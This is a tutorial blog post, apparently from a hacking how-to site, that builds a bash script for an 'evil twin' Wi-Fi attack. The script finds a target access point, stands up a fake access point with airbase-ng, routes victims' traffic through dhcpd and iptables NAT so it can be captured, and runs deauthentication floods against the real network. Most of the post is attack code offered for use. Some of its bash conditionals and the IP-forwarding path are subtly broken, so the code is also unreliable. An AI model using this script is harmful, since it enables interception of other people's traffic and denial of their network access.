How To: Evil Twin (Part 2) - Creating the Bash Script.

Evil Twin (Part 2) - Creating the Bash Script.

Back for the second part,

Just to recap in part one, we installed and configured the dhcp server. This will allow us to pass our clients requests out to the internet. This is a very important step in the evil twin attack because if your targets (clients) can't make it out to the WWW, they will assume something is wrong. In all reality the attack wont work because we are trying to capture their traffic. So we must provide that with the help of the dhcp server.

Image via slate.com

In this post I will go through the steps of setting up the bash script. Here is a screenshot of the menu page from here I will explain the steps to building the script. Do to the massive length of this post i will be post the entire bash script on its own post with links to the 2 previous post(the dhcp set up and this post).

Step 1: Open Your Favorite Text Editor ( I Will Use Nano)

In the terminal cd to the directory where you would like to create your bash script, I will create mine in a directory called scripts within my home directory

  • cd to home directory: cd ~
  • make the scripts directory: mkdir scripts
  • run the text editor: nano

Step 2: The Scripts First Line

  • The very first line must be: #!/bin/bash

Step 3: Declare the Functions

  • The first function(option0) just asks what is your monitor mode wifi adapter. this is set when you first launch the script and you only need to change this if you change your adapter(which I can't see why you would)

function option0(){
echo ""
echo "Enter your monitor mode interface (wlan1mon): "
read interface
}

  • The second function(option1) just runs a basic airodump-ng command so that you can find your target.

function option1(){
gnome-terminal -x airodump-ng $interface &
wait
}

  • The third function(option2) runs airodump-ng command again but this time with switches so you can hone in on your target AP.

function option2(){
bssid=''
while -z $bssid ; do
echo "Enter the BSSID: "
read bssid
done

channel=''
while -z $channel ; do
echo "Enter the Channel: "
read channel
done

echo "Write File Prefix: "
read writeFilePrefix
if -z $writeFilePrefix ; then
echo "No Write File Specified"
else
writeFile=" -w $writeFilePrefix"
fi

sleep 3

gnome-terminal -x airodump-ng --bssid $bssid -c $channel $writeFile $interface &
wait
}

  • The fourth function(option3) sets up and runs the evil twin. You will be prompted for input to set up the Evil Twin AP. It will then kill a couple processes dhcpd and airbase-ng. Then the airbase-ng command will run. After that you will be prompted for some more input to set up the dhcp server. The ip tables will be build and then we start the dhcpd service. The final step is to forward ip's. Our clients/target can hit the WWW.

function option3(){
options3=''
echo "Time to set up the Evil Twin AP!!!"
sleep 2
echo "Evil Twin ESSID: "
read etEssid
if -z $etEssid ; then
echo "ESSID not set"
else
options3="$options3 --essid $etEssid"
fi
echo "Evil Twin BSSIDoptional: "
read etBssid
if -z $etBssid ; then
echo "BSSID not set"
else
options3="$options3 -a $etBssid"
fi
echo "Enter the Channel: "
read etChannel
if -z $etChannel ; then
echo "Channel not set"
else
options3="$options3 -c $etChannel"
fi
echo "Enter the host MAC(client connected to target AP)optional: "
read etHost
if -z $etHost ; then
echo "Host MAC not set"
else
options3="$options3 -h $etHost"
fi
sleep 3

echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 2;
echo "Killing DHCP..."
pkill dhcpd
sleep 5;
#echo $options3
echo "Starting Fake AP..."
gnome-terminal -x airbase-ng $options3 $interface &

sleep 2
echo "Starting DHCP Server..."
etInterface=''
while -z $etInterface ; do
echo "Enter Evil Twin Interface"
read etInterface
done

etNetwork=''
while -z $etNetwork ; do
echo "Enter Evil Twin Network (example: 10.0.0.0)"
read etNetwork
done

ifconfig $etInterface up
sleep 2

echo "These next two setting MUST!!! match the setting in your dhcpd.conf file"
sleep 2

etIP=''
while -z $etIP ; do
echo "Enter Evil Twin IPv4 Address"
read etIP
done

etNetmask=''
while -z $etNetmask ; do
echo "Enter Evil Twin netmask"
read etNetmask
done

etOutInterface=''
while -z $etOutInterface ; do
echo "Enter your internet faceing interface:"
read etOutInterface
done

sleep 2
ifconfig $etInterface up
ifconfig $etInterface $etIP netmask $etNetmask
route add -net $etNetwork netmask $etNetmask gw $etIP
sleep 5

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $etOutInterface -j MASQUERADE

echo > '/var/lib/dhcp/dhcpd.leases'
ln -s /var/run/dhcp/dhcpd.pid /var/run/dhcpd.pid
gnome-terminal -x dhcpd -d -f -cf /etc/dhcp/dhcpd.conf $etInterface &

sleep 5
echo "1" > /proc/sys/net/ipv4/ipforward
}

  • The fifth function(option4) runs a aireplay-ng command to kick all the clients off of the real AP.

function option4(){
deauthType=''
while -z $deauthType ; do
echo "Would you like to run a basic deauth attack? (--deauth 100)"
echo "1 Yes"
echo "2 No"
read deauthType
done
echo "you selected $deauthType"
if $deauthType = 1 ; then
gnome-terminal -x aireplay-ng --deauth 100 -a $bssid $interface &
fi

if $deauthType = 2 ; then
echo "Enter your aireplay-ng options, you must add the -a tag, and DO NOT include the interface"
read options4
gnome-terminal -x aireplay-ng $options4 $interface &
fi
wait
}

  • The sixth function(option5) runs some pkill commands to stop all the processes we started and then closes the terminal.

function option5(){
echo "Killing airbase-ng"
pkill airbase-ng
sleep 1
echo "Killing dhcpd"
pkill dhcpd
sleep 1
echo "Killing aireplay-ng"
pkill aireplay-ng
sleep 1
echo "Killing airodump-ng"
pkill airodump-ng
sleep 1
echo "sleeping..."
sleep 2
exit
}

  • Then a function that will display the menu.

function menu(){
echo "What would you like to do?"
echo "0 set up interface"
echo "1 find the target"
echo "2 hone in on target"
echo "3 set up Evil-Twin AP"
echo "4 deauth the target AP"
echo "5 exit"
read userInput

}

  • And lastly a function to take action on the user input.

function userAction(){
case $userInput in
0) option0 ;;
1) option1 ;;
2) option2 ;;
3) option3 ;;
4) option4 ;;
5) option5 ;;
esac
}

Step 4: Now the the Code for the UI

  • First we will echo some intro text ( i will leave that out to shorten this already colossal post).
  • Then some valuable info will be echo'd

echo "You MUST set your usb Wifi adapter in monitor mode first"
sleep 1
echo "You MUST have DHCP server installed and configured"
sleep 2
echo "Then follow the steps 1-5"
echo "This will help set up an Evil Twin AP"

  • We then set the user input variable to null and the interface variable to null

uI=0;
interface=''

  • Run a while loop until the user enters the monitor mode interface. Its pointless to let a user go past this point as you must have a monitor mode interface to make things work.

while -z $interface ; do
option0
done

  • Now we run a loop to keep repeating the menu until the user decides to exit the script.

until $uI = 5 ; do
menu
uI=$userInput
#echo "you selected $uI hello"
userAction
done

I hope this post was not too long, There was just a lot to cover, also this is my VERY FIRST BASH SCRIPT, so please provide me with any and all comments as I like to see others input and maybe there is an easier way to accomplish this.

As always thank you for reading and I hope this post helps make someones life easier.

The link to the full code is here .

-P4nT4N30

1 Comment

Really great tutorial, helped me alot understand shell script on the way. I created my own version using this steps...

Share Your Thoughts

  • Hot
  • Latest